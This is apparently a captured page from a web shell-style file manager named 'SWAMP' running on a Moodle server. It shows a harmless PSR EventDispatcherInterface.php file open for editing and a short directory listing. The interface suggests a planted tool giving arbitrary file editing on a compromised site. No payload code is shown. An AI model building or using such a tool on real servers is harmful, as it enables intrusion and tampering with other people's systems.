░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/moodle/public/lib/psr/event-dispatcher/src
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: EventDispatcherInterface.php
<?php declare(strict_types=1); namespace Psr\EventDispatcher; /** * Defines a dispatcher for events. */ interface EventDispatcherInterface { /** * Provide all relevant listeners with an event to process. * * @param object $event * The object to process. * * @return object * The Event that was passed, now modified by listeners. */ public function dispatch(object $event); }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 EventDispatcherInterface.php
PHP
431 B
2026-02-11 01:44
EDIT
📄 ListenerProviderInterface.php
PHP
524 B
2026-02-11 01:44
EDIT
📄 StoppableEventInterface.php
PHP
785 B
2026-02-11 01:44
EDIT